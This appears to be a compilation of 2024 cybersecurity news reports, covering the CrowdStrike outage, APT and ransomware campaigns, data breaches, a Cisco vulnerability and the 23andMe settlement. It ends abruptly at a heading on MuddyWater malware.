CrowdStrike is actively working to resolve a defect in a content update that struck about 8.5 million Windows machines on July 19 - and continues to disrupt many Windows hosts days later. In a recent update, the cybersecurity company said it has "tested an update to the remediation that was deployed on Friday, July 19, 2024 05:27 UTC. The update has accelerated our ability to remediate hosts. Customers are encouraged to follow the Tech Alerts for latest updates as they happen." The organization has also "published a video outlining the steps required to self-remediate impacted remote Windows laptops. We will continue to provide updates here as information becomes available and new fixes are deployed", denoted the official response. In the update, CrowdStrike explains that this incident is not a cyberattack and they have already "identified and isolated, and a fix has been deployed" for mitigation. CrowdStrike has previously introduced a new technique aimed at expediting system remediation for impacted systems. The company is currently in the process of operationalizing an opt-in option for this method. Customers are encouraged to stay informed by following CrowdStrike's Tech Alerts for timely updates and will receive notifications when action is necessary. Microsoft has also released a fix for the faulty CrowdStrike update, which resulted in bugcheck and "blue screen of death" (BSOD) errors on millions of Windows hosts. Delta Airlines was one noteworthy company struggling to recover from the outages, and was still canceling about 20% of its flights as of early afternoon Eastern U.S. time on Monday, July 22. CrowdStrike shares (CRWD) have plunged more than 20% since the incident, erasing roughly $15 billion in market cap. CEO George Kurtz has assured customers that the faulty update was not due to a cyberattack and that Falcon platform systems remain unaffected.

CrowdStrike Outage Response and Customer Support

The defective update stemmed from a Windows sensor-related content deployment, specifically a channel file in the CrowdStrike directory, which has sparked widespread discussion in the cybersecurity industry about how to ensure that software updates and rollouts are safer and more reliable. CrowdStrike CSO Shawn Henry took to LinkedIn to apologize for the incident:

"On Friday, though, we failed. The past two days have been the most challenging 48 hours for me over 12+ years. The confidence we built in drips over the years was lost in buckets within hours, and it was a gut punch. But this pales in comparison to the pain we've caused our customers and our partners. We let down the very people we committed to protect, and to say we’re devastated is a huge understatement. I, and the entire company, take that personally. Thousands of our team members have been working 24/7 to get our customer systems fully restored. The days have been long and the nights have been short, and that will continue for the immediate future. But that is part of the promise we made to all of you when you put your trust and protection in our hands."

The company quickly mobilized its resources to assist affected customers. A new technique to accelerate system remediation was tested in collaboration with clients, with an opt-in process being implemented. CrowdStrike is providing regular updates through its support portal and social media channels, urging customers to verify communication with official representatives. Kurtz emphasized the company's commitment to transparency and customer trust. "Nothing is more important to me than the trust and confidence that our customers and partners have put into CrowdStrike," he stated. The CEO promised full disclosure on the incident's cause and preventive measures for the future.

Technical Details and Remediation Steps

For systems still experiencing crashes, CrowdStrike recommends rebooting to download the reverted channel file - multiple times, if necessary. If issues persist, manual or automated remediation options are available, including the use of a bootable USB key for automated fixes. In response to the widespread issues caused by the faulty update of the CrowdStrike Falcon agent on Windows-based clients and servers, Microsoft released its own recovery tool to help system administrators and IT staff. The updated Microsoft recovery tool offers two repair options - Recover from WinPE (Windows Preinstallation Environment) or Recover from Safe Mode - and also includes guidance for recovering BitLocker encryption keys, if necessary. [caption id="attachment_83163" align="aligncenter" width="300"] CrowdStrike update on Windows outage recovery[/caption] As the situation evolves, CrowdStrike continues to prioritize customer support and system restoration, even as the issue of who will pay for the restoration efforts remains unresolved. The company acknowledges the impact of the incident and says it is working tirelessly to regain customer confidence through transparent communication and effective problem-solving. Shawn stated in his post, "I know I speak for the women and men of CrowdStrike when I say thank you to every customer and partner who has also been working around the clock. You are the real heroes in all of this. We are committed to re-earning your trust by delivering the protection you need to disrupt the adversaries targeting you. Despite this setback, the mission endures."  

A China-linked hacking group known as Ghost Emperor has resurfaced with an updated version of its sophisticated Demodex rootkit, according to cybersecurity researchers. Ghost Emperor typically targets Southeast Asian telecom and government entities, and has modified its infection chain and added new evasion techniques to its malware arsenal.

New Ghost Emperor Demodex Infection Chain

GhostEmperor employs a multi-stage malware to achieve stealth execution and persistence and utilizes several methods to impede analysis process. [caption id="attachment_82910" align="alignnone" width="2048"] Source: sygnia.co[/caption] Researchers from Sygnia discovered that the updated Demodex infection chain begins when attackers use WMIExec, a remote execution tool, to run a batch file on the victim's machine. The batch file drops a CAB file named "1.cab" to C:\Windows\Web, extracts four files, and imports two malicious registry files to target systems using the reg.exe import [file] command. The threat actor employs legitimate Microsoft tools, such as reg.exe and expand.exe, to achieve stealth in its attack operations. After importing the registry keys, the batch file executes an encrypted PowerShell script to create a new service named "WdiSystem" to load a malicious Service DLL (prints1m.dll) file. The script also creates a service group called "WdiSystemhost" and runs the malicious service within this group, in order to masquerade the malware process as a legitimate Windows system process within the operating system. The Service DLL dynamically loads necessary functions using an internal OS structure named Process Environment Block, accesses the LoadLibraryA function, and deciphers an encrypted configuration containing parameters such as initial sleep time, registry paths of the shellcode location, and a list of module and function names required for operation. The security firm's incident response team uncovered the new variant while investigating a network breach that affected both a client and its business partner. The malware, compiled in July 2021, shares similarities with a version analyzed by Kaspersky in 2021 but incorporates several key changes.

Enhanced Evasion Techniques

The attack operation employs an EDR evasion technique by setting a specific mitigation policy to its processes, forbidding the loading of DLLs that are not signed by Microsoft. This limits user-mode hooking and helps circumvent analysis tools. The service also reads two encrypted registry keys, decrypts the shellcode, and sets up a reflective loader to execute the core-implant DLL. The researchers note that Ghost Emperor has implemented the following new methods to evade detection

• EDR Evasion: The malware sets a process mitigation policy that prevents loading of non-Microsoft signed DLLs, potentially blocking security software from injecting monitoring code.
• Dynamic Function Loading: The malicious DLL dynamically loads necessary functions, making static analysis more difficult.
• Encrypted Configuration: Key parameters, including registry paths and required function names, are stored in an encrypted configuration within the DLL.
• Reflective Loading: A position-independent shellcode acts as a reflective loader for the core implant, which is stored as a corrupted PE file to resist analysis.

The researchers have shared the following list of IOCs (Indicators of Compromise) [caption id="attachment_82909" align="aligncenter" width="463"] Source: sygnia.co[/caption] The Ghost Emperor threat actor group is the latest among several Chinese-linked APTs that demonstrate advanced techniques and evolved capabilities in its operations, raising concerns among governments, independent researchers and security firms about threats from the region.

Two foreign nationals from the notorious international ransomware group LockBit pleaded guilty in Newark federal court for participating in the group and deploying attacks against victims in the United States and worldwide. Ruslan Magomedovich Astamirov, 21, a Russian national, and Mikhail Vasiliev, 34, a dual Canadian-Russian citizen, admitted to involvement in these activities. Between 2020 and 2024, the LockBit group had attacked over 2,500 victims in at least 120 countries, with 1,800 of those in the United States, extorting hundreds of millions of dollars in the form of ransom payments.

Scope of LockBit's Operations

The guilty pleas follow a recent disruption of LockBit ransomware in February, in which the UK National Crime Agency's Cyber Division, working with the Justice Department, FBI, and other international law enforcement partners, seized public-facing websites and control of servers used by LockBit administrators, disrupting the group's ability to attack and encrypt networks. The disruption diminished LockBit's reputation and ability to attack further victims. The case also involves charges brought against other LockBit members, including its alleged creator, developer, and administrator, Dmitry Yuryevich Khoroshev, who is currently the subject of a reward of up to $10 million through the U.S. Department of State's Transnational Organized Crime Rewards Program. Khoroshev is accused of recruiting new affiliate members, acting as the representative for the group, and developing and maintaining the infrastructure used by affiliates to deploy LockBit attacks. U.S. Attorney Philip R. Sellinger emphasized the commitment to holding cybercriminals accountable, stating:

“Astamirov and Vasiliev thought that they could deploy LockBit from the shadows, wreaking havoc and pocketing massive ransom payments from their victims, without consequence. They were wrong. We, in New Jersey, along with our domestic and international law enforcement partners will do everything in our power to hold LockBit’s members and other cybercriminals accountable, disrupt and dismantle their operations, and put a spotlight on them as wanted criminals – no matter where they hide."

Impact of the Guilty LockBit Pleas

Astamirov, who operated under aliases such as "BETTERPAY" and "Eastfarmer," deployed LockBit against at least 12 victims between 2020 and 2023, extorting approximately $1.9 million in ransom payments. He agreed to forfeit $350,000 in seized cryptocurrency as part of his plea agreement. Vasiliev, who was known online as "Ghostrider" and "Free," among other aliases, targeted at least 12 victims between 2021 and 2023, causing at least $500,000 in damages and losses. These guilty pleas follow a recent disruption of LockBit's infrastructure by international law enforcement agencies in February. The operation significantly diminished the group's ability to attack further victims and damaged its reputation.

LockBit Victim Assistance

LockBit victims are encouraged to contact the FBI and submit information at https://lockbitvictims.ic3.gov. Law enforcement has developed decryption capabilities that may enable hundreds of victims around the world to restore systems encrypted using the LockBit ransomware variant. Victims are also encouraged to visit https://www.justice.gov/usao-nj/lockbit for case updates and information regarding their rights under U.S. law, including the right to submit victim impact statements and request restitution.

In today's digital age, healthcare data has become a prime target for cybercriminals. With a single health record fetching up to $1,000 on the dark web, Chief Information Security Officers (CISOs) in the healthcare sector face unprecedented challenges. Healthcare data's comprehensive nature makes it a high-value commodity on the dark web, attracting cybercriminals seeking to exploit outdated IT systems and ransomware vulnerabilities. With the help of Cyble's skilled threat intelligence researchers, we offer dark web monitoring insights for CISOs, delving into the dark web's lure for healthcare data, the risks presented by healthcare data breaches, and the essential steps CISOs must take to secure sensitive information.

Dark Web's Allure for Healthcare Data

The dark web, defined as that part of the web that is excluded from search engines and can often only be accessed through specialized browsers like Tor, has become a hub for the illicit activities of cybercriminals. The dark web's anonymity provides a safe haven for illegal activities and an ideal setting for the sale of stolen healthcare data. A single health record can fetch a price as high as $1,000, exceeding the value of credit card or Social Security numbers. In an article on its website, the American Hospital Association Center for Health Innovation cites data from an IBM Security study, stating:

In fact, stolen health records may sell up to 10 times or more than stolen credit card numbers on the dark web. Unfortunately, the bad news does not stop there for health care organizations — the cost to remediate a breach in health care is almost three times that of other industries — averaging $408 per stolen health care record versus $148 per stolen non-health record.

[caption id="attachment_82826" align="alignnone" width="1721"] Post on BreachForums alleging breach of HealthCare.gov[/caption] According to Cyble Research and Intelligence Labs (CRIL), outdated IT infrastructure and operating systems in many healthcare organizations leave them vulnerable to cyberattacks. The COVID-19 pandemic has further exacerbated these risks by necessitating remote work and creating new security gaps. Cybercriminals have developed a sophisticated multi-tiered business model for stolen healthcare data, making it difficult for law enforcement to trace the source. Illegally obtained data is commoditized and sold, with the price varying based on the potential value to the buyer. This data is often combined with other information to create complete patient profiles, which are then sold for various fraudulent activities. The comprehensive nature of healthcare data records and its richness in personal information makes it a goldmine for identity theft and insurance fraud - and a threat that healthcare CISOs need to stay on top of.

Ransomware Disruptions to Healthcare

Ransomware attacks have become a profitable venture for cybercriminals, with healthcare organizations prime targets due to the critical nature of their services and the high value of patient data. These disruptions can lead to compromised patient care, increased mortality rates, and severe financial and operational consequences. [caption id="attachment_82820" align="alignnone" width="2076"] Source: Cyble Threat Landscape Report 2024 (Emerging Threats to the U.S. Healthcare Sector in 2024)[/caption] According to data from the Director of National Intelligence, ransomware attacks on healthcare providers have surged, with an increase of up to 128 percent in the U.S. alone, with 258 victims in 2023 compared to 113 victims in 2022. The study found that LockBit and ALPHV/BlackCat were the two most "popular RaaS providers" and were responsible for more than 30 percent of all reported healthcare attacks that had occurred worldwide. [caption id="attachment_82831" align="alignnone" width="2096"] Source: dni.gov[/caption] These attacks not only disrupt services but also lead to increased patient stay lengths, delays in medical procedures, and in some cases, higher mortality rates, substantial financial costs, potential HIPAA violations and even reputational damage to the healthcare institute. And the data stolen in these attacks often winds up for sale on the dark web. The DNI's study stated, "US hospitals have delayed medical procedures, disrupted patient care because of multi-week outages, diverted patients to other facilities, rescheduled medical appointments, and strained acute care provisioning and capacity as a result of ransomware attacks." [caption id="attachment_82821" align="alignnone" width="1906"] Source: Cyble Threat Landscape Report (Emerging Threats to the U.S. Healthcare Sector in 2024)[/caption] Cybercriminals employ various tactics in healthcare ransomware attacks, including:

• Phishing emails with malicious links
• Complex attacks designed to maximize damage
• Encrypting personal health information (PHI)
• Exploiting vulnerabilities in medical devices

Protecting the Healthcare Sector

As healthcare data becomes increasingly valuable on the dark web, CISOs must remain vigilant and proactive. By implementing robust security measures, educating staff, and empowering patients, healthcare organizations can better protect sensitive information from cyber threats. Educating healthcare staff on data handling: The persistent targeting of the healthcare industry highlights the vital need for cybersecurity training efforts. Staff must be educated on identifying phishing attempts, using secure authentication practices like MFA, complying with HIPAA and other laws, and adhering to mobile and other device security policies. A visible and accessible healthcare security team, supported by proactive leadership, can foster a culture where security is everyone's responsibility. Patient involvement in protecting healthcare data: Patients also have a role to play in the protection of healthcare data - they should actively review health records, use secure healthcare channels, and report any suspicious activities to healthcare providers. Monitoring the dark web: Tools such as Cyble’s dark web monitoring solution offer early breach detection capability and AI-powered threat tagging, enabling CISOs to identify threats and breaches earlier to address and contain problems faster. Comprehensive logging of healthcare systems: Comprehensive logging of your healthcare systems can help CISOs and security staff track and analyze potential security incidents. Strong access controls: Implementing strong access controls for critical healthcare systems, including role-based access control (RBAC), Multi-factor authentication and the principle of least privilege, can help prevent hacker access to sensitive data. Regularly reviewing and updating access controls can help ensure compliance with changing security requirements. Data encryption: Encrypting sensitive healthcare data in transit and at rest using industry-standard encryption protocols (e.g., SSL/TLS, AES) can help protect that data from unwanted access. Secure mobile devices: Developing and enforcing a mobile device security policy should include best practices for device configuration, password management, and data encryption for mobile devices used within the healthcare environment. Network segmentation: Implementing network segmentation can isolate critical healthcare systems and reduce the attack surface. Keep software, firmware, and applications updated: Establishing a regular update schedule for software, firmware, and applications used in healthcare systems can help keep threat actors out of your systems. Implement automated update mechanisms where possible to minimize downtime and ensure timely patching of vulnerabilities.

Monitoring the Dark Web for Healthcare Data

Healthcare CISOs can do a lot to protect patient data and keep it off the dark web by isolating and securing critical systems and encrypting data. But in the event that some data does leak out, dark web monitoring solutions are your best bet for an early warning.

Pueblo County School District 70 is taking steps to address a recent data breach and ransomware attack that may have compromised the personal information of former students of the Colorado school district, as well as current and former staff. The data compromised in the Pueblo County School District 70 data breach is believed to stem from between 1991 and 2006, and is said to include student and staff records from an undetermined period. Superintendent Ronda Rein acknowledged the delay of public disclosure of the data breach incident, and confirmed the involvement of federal agencies in its investigation.

Pueblo County School District 70 Data Breach Response

According to one report the district had been notified of the ransomware attack by Sophos on April 27, and a data breach was confirmed by the CIA on May 15. IT technicians and agents from various organizations, including Pueblo School District 60, Colorado State University Pueblo, the CIA, and the FBI, assisted in identifying the affected data. According to Superintendent Ronda Rein, the district was not allowed to release information immediately due to the involvement of the CIA in the investigation. It's not clear why the CIA was involved in the matter. [caption id="attachment_82599" align="aligncenter" width="466"] Pueblo County School District 70 Data Breach Notice (Source: district70.org)[/caption] Rein emphasized that the district has taken measures to strengthen its systems and protect personal information. These measures include implementing two-step authentication on staff accounts, removing critical information from local servers to cloud-based servers, and hiring a full-time staff member responsible for cybersecurity. The district has also limited access to district resources to U.S.-based requests and narrowed its firewall and VPN access to admin staff only.

Advice for Affected Individuals

In its data breach notice, the Pueblo County School District 70 advised students, staff, alumni, and community members to monitor credit reports and financial statements, consider restricting access to their credit report, consider a fraud alert, and protect themselves from suspicious communications. Those seeking additional assistance can contact the district's IT support team at 719-549-6121. By taking active measures to strengthen its systems and inform affected individuals, Pueblo County School District 70 hopes to support its community during potential fallout from the data breach incident. Superintendent Rein stated, "We take the privacy and security of our community's information extremely seriously." She added, "We are working diligently with cybersecurity experts to fully understand the scope of this incident and to strengthen our systems against future threats. The incident notice promoted the use of identity theft protection resources available through Equifax, Experian, LifeLock, and TransUnion, stating that contact information for the mentioned agencies were available on the school district's website. "We apologize for any concern or inconvenience this may cause and are committed to supporting our community through this process," the data breach notice read.

Researchers have observed a seemingly innocuous software installer named HotPage.exe being used to deploy a Microsoft-signed driver with the capability of injecting code into remote system processes and intercepting browser traffic. While the malware had been initially detected as adware, its malware-like ability to modify web content and redirect users raised red flags among security researchers. The driver, signed by Microsoft, was developed by an obscure Chinese company called Hubei Dunwang Network Technology Co., Ltd.

Intrusive Nature of HotPage

Advertised towards Chinese-speaking users, the software claims to enhance web browsing by blocking ads and malicious sites. However, in reality HotPage abuses its functions to display game-related ads and collect system information. At its core, researchers from ESET state that the malware functions through the use of a Microsoft-signed driver to perform code injection into processes running on the infected system. Along with this code execution, the malware installs two libraries designed to intercept and manipulate browser network traffic to affected systems. This allows the malware to modify web page content, redirect users, or even open new tabs based on predetermined conditions. The kernel-level access granted by the embedded driver opens up pathways for the deployment of additional malware payloads on victim systems. Through the exploitation of improper access restrictions, the malware potentially allows threat actors to execute code with the highest available privileges within the Windows operating system. Following the discovery of these vulnerabilities, the Microsoft Security Response Center (MSRC) was notified on March 18, 2024. By May 1, 2024, the driver was removed from the Windows Server Catalog, with researchers identifying the threats as Win{32|64}/HotPage.A and Win{32|64}/HotPage.B. [caption id="attachment_82628" align="alignnone" width="891"] Source: welivesecurity.com[/caption]

The Company Behind the Malware

The malware's developers had obtained an Extended Verification certificate from Microsoft for use in signing the HotPage driver. The company, Hubei Dunwang Network Technology Co., Ltd., had been established in January 2022 and is now owned by Wuhan Yishun Baishun Culture Media Co., Ltd., a small advertising firm. Despite claiming to offer security solutions, researchers believe the company's product seems to contradict its own license agreement. While the company stated that DwAdsafe lacked interception capabilities, the software actually includes intrusive monitoring and filtering functions. [caption id="attachment_82631" align="aligncenter" width="433"] Web-crawled screenshot of dwadsafe.com before shutdown (Source: welivesecurity.com)[/caption] The company's website, dwadsafe[.]com, is no longer accessible, but archived versions describe the product as an "Internet cafe active defense cloud platform." Researchers note conflicts between the company's license agreement and the software's actual purpose and capabilities. While masquerading as a helpful tool, HotPage poses significant risks to user privacy and system security. Its signed driver and deceptive marketing demonstrate a disturbing trend where malware programs are presented as legitimate software with well-intentioned purposes. The campaign underscores the critical need for thorough vetting processes for driver signing as threat actors attempt to exploit trust in legitimate software channels.

Cisco has issued a critical security advisory for a vulnerability in its Cisco Smart Software Manager On-Prem licensing tool, which could allow attackers to change any user's password, including those of administrators on license servers. The flaw, tracked as CVE-2024-20419, affects SSM On-Prem installations earlier than Release version 7.0, also known as Cisco Smart Software Manager Satellite (SSM Satellite).

Cisco Smart Software Manager On-Prem Vulnerability

The vulnerability has been rated at the maximum severity score of 10.0 on the CVSS scale, and stems from an improper implementation of the password-change process in SSM On-Prem's licensing authentication system. [caption id="attachment_82558" align="alignnone" width="2162"] Source: sec.cloudapps.cisco.com[/caption] The National Vulnerability Database provides the following description about the vulnerability:

A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device."

As a Cisco Smart Licensing component, SSM On-Prem plays a crucial role in managing customer accounts and product licenses for service providers and Cisco partners. Successful exploitation of this flaw enables attackers to send crafted HTTP requests and gain access to the web UI or API with all the privileges associated with compromised user accounts.

SSM On-Prem Disclosure and Official Patch

Cisco acknowledged the disclosure of the vulnerability and expressed appreciation for the efforts of Mohammed Adel, the researcher who reported this vulnerability. Cisco has released software updates to address the vulnerability, and stated that there were no available workarounds. Cisco has advised customers with active service contracts to obtain the necessary security fixes through their regular update channels. Those without service contracts can contact the Cisco Technical Assistance Center (TAC) to obtain the required upgrades. Cisco's Product Security Incident Response Team (PSIRT) has not yet found evidence of public proof-of-concept (POC) exploits or active exploitation attempts targeting this vulnerability. However, the company urges customers to remain vigilant and regularly consult Cisco security advisories to stay informed about the latest threats and mitigation strategies. [caption id="attachment_82556" align="alignnone" width="2162"] Source: sec.cloudapps.cisco.com[/caption] The company has provided a clear roadmap for affected and fixed releases, as detailed in the advisory. Customers are strongly encouraged to upgrade to the appropriate fixed software release to secure their SSM On-Prem installations and protect against potential exploitation. It is essential to ensure that devices that are to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. Customers are advised to regularly consult advisories for Cisco products to determine exposure and a complete upgrade solution. The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads.

Recruit Co., Ltd., a prominent Tokyo-based company, recently announced a data breach had affected its real estate wing SUUMO and had compromised sensitive data from several of its employees. The incident, discovered on July 9, involved unauthorized access to a server used to test out some of its real estate services. The company says no user or customer information was compromised, and no secondary damage has been reported. However, the breach exposed personal data records of 1,313 current and former employees going as far back as 2007. The firm has also come under increased scrutiny recently over its data collection policies of student data as well as its outsourcing to foreign nations.

Recruit Co Ltd Response and Preventive Measures

On July 9th, SUUMO, the real estate branch of Recruit, had detected unauthorized access from a third party to the server of a service provided to real estate companies and which was being tested before deployment in some areas. [caption id="attachment_82339" align="alignnone" width="2186"] Source: suumo.jp[/caption] While the affected system had been shut down, it was discovered some of this data relating to employees had been compromised. Recruit expressed regret for the inconvenience and concern stemming from the incident. Recruit took several actions to limit the impact of the breach, including:

• Contacting affected employees individually
• Setting up a hotline for inquiries
• Implementing measures against unauthorized access
• Rebuilding and re-inspecting affected servers
• Strengthening overall security measures

The statement on its website, issued from the head office in Chiyoda-ku, Tokyo by  President and CEO Yoshihiro Kitamura, announced that data related to 1,313 employees and contractors involved in the development and maintenance of its housing-related services since 2007. "We would like to report the following and offer our deepest apologies for the considerable inconvenience and concern caused to all concerned parties," the statement expressed. "In addition, no leaks of user or customer information have been confirmed in this incident. As of today, no secondary damage caused by the use of employee information has been confirmed," it added.

Concerns Over Student Data Management and Outsourcing

In a separate recent development, Recruit Co. came under intense scrutiny for its handling of public school students' personal data. While the company had also been authorized by some local governments to collect and manage student information to provide various educational apps, other local governments reported that they had not fully been aware of the data collection practices. These concerns were raised further as it came to light that Recruit had allegedly shared some of this data with foreign businesses to improve other commercial apps. A Yomiuri Shimbun survey found that at least 14 local governments have introduced Recruit’s apps this fiscal year, and about 85,000 elementary and junior high school students use the apps. Some of the local governments were unaware of the overseas outsourcing and other improper management of students’ personal data. The education ministry announced plans to investigate the situation nationwide, after suspecting mismanagement of student data by local governments and the firm. The ministry emphasized the importance of local governments taking proper initiative while collecting and managing students' data, and requires them to supervise app providers and exercise caution when storing data overseas.

Genetic testing company 23andMe has reached a settlement in principle for class actions stemming from a 2023 data breach, lawyers announced during a San Francisco court hearing on Tuesday. The breach compromised the personal information of nearly 7 million users, including sensitive genetic profiles. While the settlement details remain undisclosed, U.S. District Judge Edward Chen of the Northern District of California scheduled a July 30 hearing to review the status of the term sheet. A motion for preliminary approval is expected within 30 to 45 days.

23andMe Settlement Negotiations and Terms

[caption id="attachment_82304" align="alignnone" width="1672"] Source: blog.23andme.com[/caption] Co-lead plaintiffs' counsel Cari Laufenberg of Keller Rohrback told Judge Chen that the parties accepted a proposal from mediator Randall Wulff following a June 26 meeting. The agreement in principle comes after a swift resolution process, with some plaintiffs' lawyers initially disagreeing in early settlement talks. Earlier in January, some plaintiffs' counsels met with 23andMe representatives to discuss settlement, but disagreements over the best approach for breach victims led to a battle over leadership of the cases. U.S. District Judge Edward Chen of the Northern District of California intervened last month, appointing co-lead counsels to oversee the cases. At a hearing last month, lawyers expressed concerns that 23andMe was in imminent danger of filing bankruptcy, suggesting that injunctive relief, including a fund to compensate class members for psychological or physical harm, would be a key focus of any settlement. The settlement is expected to encompass the multidistrict litigation, state court cases, and thousands of arbitration demands. While specific terms are not yet public, previous discussions suggested a potential 'steep discount' in monetary relief for class members in a case that faced up to $3 billion in damages under the Illinois Genetic Information Privacy Act. The terms in the settlement may include Injunctive relief from 23andMe (requiring a certain party to act in a certain way) and to provide options such as dark web monitoring to victims.

Financial Implications and Company Response

[caption id="attachment_82306" align="alignnone" width="2018"] Source: 23andme.com[/caption] 23andMe's annual report revealed $216 million in cash, which could impact the settlement amount. The company's attorney, Ian Ballon of Greenberg Traurig, expressed a focus on settlement and approval moving forward. A 23andMe spokesperson stated that the agreement is "in the best interest of 23andMe customers," and the company looks forward to finalizing the settlement. This resolution comes as a relief to the company, which faced potential bankruptcy concerns raised by lawyers during previous hearings. The settlement marks a significant step in addressing the fallout from the data breach, relieving some fears that had been stoked earlier after the genetic information of specific ethnic groups had been compromised. This specific data had been advertised earlier on a hacking forum as a list of Ashkenazi Jews, while another had been described as another as a list of people of Chinese descent. As the case progresses, the final terms of the settlement will provide insight into how 23andMe plans to compensate affected users and improve its data security measures.

FIN7, a financially motivated threat actor group with origins in Russia, has shown a persistent determination to evolve and adapt its tactics despite setbacks and arrests, utilizing multiple pseudonyms to mask its true identity and sustain its criminal operations. The group, which has been active since 2012, initially focused on point-of-sale malware for financial fraud, but shifted to ransomware operations in 2020, affiliating with well-known ransomware-as-a-service groups and launching its own independent programs.

FIN7 Underground Operations

New research from SentinelOne has uncovered FIN7's recent activities in underground criminal forums, where the group markets its tools and services under various fake aliases. Of these tools, the group has most prominently been selling a highly specialized tool labelled as AvNeutralizer (also known as AuKill) that is designed to disable most security solutions. [caption id="attachment_82281" align="alignnone" width="932"] Source:sentinelone.com[/caption] Advertisements for the AvNeutralizer tool appeared on multiple different forums under various usernames, for sale in prices ranging from $4,000 to $15,000. Researchers state that the tool's widespread adoption by various ransomware groups suggests it is no longer exclusive to a single threat actor's operations. Researchers identified several usernames – including "goodsoft," "lefroggy," "killerAV" and "Stupor" – that suggested association with the FIN7 cybercriminal group in promoting its tools and services, such as a post-exploitation framework labelled as "PentestSoftware." [caption id="attachment_82287" align="alignnone" width="1073"] Source:sentinelone.com[/caption] The group's use of multiple identities across different forums appears to be a strategy to mask its true identity while maintaining its illicit operations.

FIN7 Arsenal Used in Operations

The FIN7 cybercriminal group's success in executing sophisticated cyberattack operations relies on a versatile toolkit that includes:

• Powertrash: A heavily obfuscated PowerShell script used to reflectively load malware in memory, evading detection.
• Diceloader: A minimal backdoor allowing attackers to establish command and control channels and load additional modules.
• SSH-based backdoor: A persistence mechanism using OpenSSH and 7zip to maintain access to compromised systems.
• Core Impact: A commercial penetration testing tool repurposed for malicious activities.
• AvNeutralizer: A specialized tool for disabling security solutions.

Analysis of Powertrash samples revealed a timeline of FIN7's malware evolution, showing a transition from Carbanak to Diceloader (also known as Lizar) in early 2021. The group has also incorporated the Core Impact pentesting tool into its arsenal, in correlation with observed underground forum activity where FIN7-associated accounts actively sought cracked copies of the software. FIN7's infrastructure includes command and control servers for Diceloader, which researchers have tracked across various countries and hosting providers. In one instance, an exposed server revealed the group's use of an SSH-based backdoor for stealthy file exfiltration. The group's adoption of commercial tools like Core Impact demonstrates its commitment to using sophisticated, hard-to-detect methods for compromising target networks. The new research sheds light on FIN7’s persistent adaptability and ongoing evolution in its operations, which include adoption of automated attack methods such as the targeting of publicly-facing servers through the use of automated SQL injection attacks. Additionally, the group's development and sale of specialized independently-developed tools such as AvNeutralizer in various criminal underground forums bolster the group's impact and influence among other cybercriminals while demonstrating its technical expertise. Fin7's use of multiple identities and active collaboration with other threat actor groups makes it much more challenging for researchers to attribute their operations. The researchers said they hope the research would inspire more efforts to understand and protect against FIN7’s continually evolving attack tactics.

Researchers have uncovered a critical vulnerability (CVE-2024-38112) that the Void Banshee threat actor group has been actively exploiting in a recent campaign to deploy the Atlantida info-stealer through a disabled version of Internet Explorer. The campaign highlights the security risks introduced by the maintenance of legacy software on modern systems.

Anatomy of Void Banshee Attack-Chain

The Void Banshee group lures victims by disguising malicious files as e-books and sharing them through cloud services, Discord servers and online libraries. When a user opens one of these files – typically a zip archive masquerading as a PDF and containing malicious shortcut files, they trigger a chain of events that ultimately installs the Atlantida stealer. [caption id="attachment_82082" align="alignnone" width="1920"] Source: trendmicro.com[/caption] Researchers from Trend Micro stated that the the attack chain begins with a spearphishing email containing a zip archive with a malicious file disguised as a PDF. The file, named "Books_A0UJKO.pdf.url", uses the MHTML protocol handler and the x-usc! directive to exploit the CVE-2024-38112 vulnerability. This allows the attacker to access and execute files through the disabled IE process. The malicious file downloads an HTML file, which in turn downloads an HTA file that contains a Visual Basic Script (VBScript) that decrypts and executes a PowerShell script. [caption id="attachment_82084" align="alignnone" width="1101"] Legacy Internet Explorer version on Modern Systems (Source: trendmicro.com)[/caption] The PowerShell script downloads an additional script from a compromised web server and executes it, creating a new process for the downloaded script. This script is designed to download and execute a PowerShell trojan, which can be used to compromise the victim's system. The campaign ultimately exploits the vulnerability in the MHTML protocol handler to access and run files through the system in-built disabled instance of Internet Explorer. This technique bypasses normal security controls and allows the attackers to directly execute the Atlantida info-stealer malware on the victim's system. The researchers note that Atlantida is based on previous open-source stealers such as  NecroStealer and PredatorTheStealer, designed with many of the same capabilities as these stealers. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, cryptocurrency wallets and web browsers such as Chrome and Microsoft Edge to exfiltrate sensitive and important data, such as passwords and cookies. The malware allows attackers to capture victim's screens and exfiltrate information from cryptocurrency-associated browser extensions, registering each extension with a unique 'Extension ID.' Data exfiltrated from the attack is compressed within a ZIP archive file and transmitted via TCP.

Microsoft Patched Vulnerability

The researchers disclosed the vulnerability to Microsoft, which patched the vulnerability in its July 2024 update cycle, unregistering the MHTML handler from Internet Explorer. However, experts warn that many systems may remain unpatched and vulnerable. To protect against this and similar attacks, security professionals recommend:

• Promptly applying all available Windows security updates
• Implementing robust email filtering to block malicious attachments
• Educating users about the dangers of opening suspicious files or links
• Deploying endpoint protection software capable of detecting and blocking such attacks

As cybercriminals continue to exploit overlooked vulnerabilities in legacy systems, the discovery of CVE-2024-38112 serves as a stark reminder of the importance of comprehensive security measures and timely patching.

MuddyWater, a notorious threat actor group linked to the Iranian intelligence service, has been operating a new malware campaign that targeted several Western and Middle Eastern entities. The malware, dubbed "MuddyRot," is a backdoor implant developed in C with a wide range of capabilities and was used primarily to attack various countries in the Middle East, such as Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel.

MuddyRot Malware

